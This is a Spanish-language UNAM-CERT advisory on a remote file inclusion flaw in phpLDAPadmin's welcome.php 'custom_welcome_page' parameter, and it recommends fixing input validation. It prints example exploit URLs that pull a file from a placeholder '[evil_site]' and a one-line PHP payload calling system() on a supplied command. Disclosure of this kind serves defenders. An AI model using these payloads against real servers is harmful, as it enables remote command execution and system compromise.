Se reportó una vulnerabilidad en phpLDAPadmin, que puede explotarse para comprometer un sistema vulnerable.
phpLDAPadmin | <= | 0.9.7/alpha5 |
rgod reportó una vulnerabilidad en phpLDAPadmin, que puede explotarse por personas maliciosas para comprometer un sistema vulnerable.
La entrada que se pasa al parámetro "custom_welcome_page" dentro de welcome.php no es verifcado apropiadamente antes de utilizarse para incluir archivos. Esto puede explotarse para agregar archivos arbitrarios desde fuentes locales y externas.
Ejemplos:
http://[host]/phpldapadmin/welcome.php-custom_welcome_page=[file]
http://[target][path]/phpldapadmin/welcome.php-custom_welcome_page=http://[evil_site]/cmd.gif
donde "cmd.gif" sea algo parecido a lo siguiente:
<-php system('[algun_comando]); ->
Una explotación exitosa requiere que "register_globals" este habilitado.
La vulnerabilidad fue reportada en la versión 0.9.6c y también en la versión 0.9.7/alpha5. Otras versiones también podrián ser afectadas.
Acceso al sistema.
Editar el código fuente para asegurarse que la entrada es verificada correctamente.
Mayor información.
http://rgod.altervista.org/La Coordinación de Seguridad de la Información/UNAM-CERT agradece el apoyo en la elaboración ó traducción y revisión de éste Documento a:
UNAM-CERT
Equipo de Respuesta a Incidentes UNAM
Coordinación de Seguridad de la Información
incidentes at seguridad.unam.mx
phishing at seguridad.unam.mx
http://www.cert.org.mx
http://www.seguridad.unam.mx
ftp://ftp.seguridad.unam.mx
Tel: 56 22 81 69
Fax: 56 22 80 47
Aviso legal |
Créditos |
Staff |
Administración
Copyright © Todos los derechos reservados
UNAM - CERT